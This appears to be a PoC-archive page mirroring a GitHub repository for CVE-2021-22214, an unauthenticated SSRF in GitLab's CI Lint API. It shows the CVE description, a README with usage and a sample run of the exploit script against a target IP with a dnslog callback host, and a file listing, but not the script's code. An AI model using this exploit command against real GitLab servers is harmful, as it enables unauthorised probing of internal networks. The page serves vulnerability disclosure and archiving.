Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-22214 PoC — GitLab 代码问题漏洞

Source
https://github.com/aaminin/CVE-2021-22214
Associated Vulnerability
Title:GitLab 代码问题漏洞 (CVE-2021-22214)
Description:GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab CE EE存在安全漏洞,该漏洞源于当对内部网络的webhook请求被启用时存在请求伪造漏洞。
Description
Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214)
Readme
# CVE-2021-22214
Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214)



> ***本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。***



#### Usage

- help

```
$ python3 gitlab_ssrf.py

===============================================================
   _____ _ _   _           _        _____ _____ _____  ______
  / ____(_) | | |         | |      / ____/ ____|  __ \|  ____|
 | |  __ _| |_| |     __ _| |__   | (___| (___ | |__) | |__
 | | |_ | | __| |    / _` | '_ \   \___ \___ \|  _  /|  __|
 | |__| | | |_| |___| (_| | |_) |  ____) |___) | | \ \| |
  \_____|_|\__|______\__,_|_.__/  |_____/_____/|_|  \_\_|

   CVE-2021-22214              Powered by r0cky Team ZionLab
===============================================================

Example:
    python3 gitlab_ssrf.py <target> <dnshost>

```

- use

target: 192.168.80.136

![1624336331315](img/1624336331315.png)

```
$ python3 gitlab_ssrf.py http://192.168.80.136/ ssrf.sleg0x.dnslog.cn

===============================================================
   _____ _ _   _           _        _____ _____ _____  ______
  / ____(_) | | |         | |      / ____/ ____|  __ \|  ____|
 | |  __ _| |_| |     __ _| |__   | (___| (___ | |__) | |__
 | | |_ | | __| |    / _` | '_ \   \___ \___ \|  _  /|  __|
 | |__| | | |_| |___| (_| | |_) |  ____) |___) | | \ \| |
  \_____|_|\__|______\__,_|_.__/  |_____/_____/|_|  \_\_|

   CVE-2021-22214              Powered by r0cky Team ZionLab
===============================================================

[+] 可能存在 GitLab SSRF 漏洞,请查看dnslog记录.
```

![1624336369016](img/1624336369016.png)
File Snapshot

 [4.0K]  /data/pocs/23e452bc49681501496b265e6477188b97935424
├── [1.6K]  gitlab_ssrf.py
├── [4.0K]  img
│   ├── [ 51K]  1624336331315.png
│   └── [ 34K]  1624336369016.png
└── [1.6K]  README.md

1 directory, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.